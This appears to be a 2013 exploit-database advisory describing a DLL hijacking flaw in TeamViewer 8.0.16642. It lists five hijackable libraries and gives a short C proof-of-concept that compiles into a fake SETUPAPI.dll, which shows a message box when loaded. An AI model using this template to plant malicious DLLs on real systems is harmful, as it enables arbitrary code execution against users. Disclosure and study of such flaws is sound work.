1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /
' \ __ /'
__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /
' _ `\ \/\ \/_/_\_<_ /'
___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm The Black Devils member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
1. ADVISORY INFORMATION
-----------------------
Product: TeamViwer V8.0.16642 Insecure Library Load
Vendor URL: http:
//www.teamviewer.com/fr/index.aspx
Date found: 2013-02-24
Date published: 2013-02-24
2. CREDITS
----------
This vulnerability was discovered and researched by The Black Devils
3. VERSIONS AFFECTED
--------------------
TeamViwer V8.0.16642, older versions may be affected too.
4. VULNERABILITY DESCRIPTION
----------------------------
An insecure library loading vulnerability has been identified
in
TeamViwer V8.0.16642.
The application uses a
fixed
path to look
for
specific files or
libraries. This path includes directories that may not be trusted or
under user control.
By placing a custom version of a library
in
the application path, the
program will load it before the legitimate version. This allows an
attacker to inject custom code that will be run with the privilege of
the program or user executing the program. The following libraries could
be hijacked on
this
way:
LPK.dll
SETUPAPI.dll
SHFOLDER.dll
CLBCATQ.DLL
Secur32.dll
5. PROOF-OF-CONCEPT (CODE / Exploit)
------------------------------------
// wine gcc -Wall -shared inject.c -o SETUPAPI.dll
#include <windows.h>
BOOL WINAPI DllMain(HINSTANCE hInstDLL, DWORD dwReason, LPVOID lpvReserved)
{
if
(dwReason == DLL_PROCESS_ATTACH)
{
MessageBox(0,
"Inj3ctor"
,
"The Black Devils"
, 0);
}
return
TRUE;
}
-----------
Contact:
# Youtube : www.youtube.com/user/Th3BlackDevils
# Facebook : www.facebook.com/DevilsDz
# Email : mr.k4rizma@gmail.com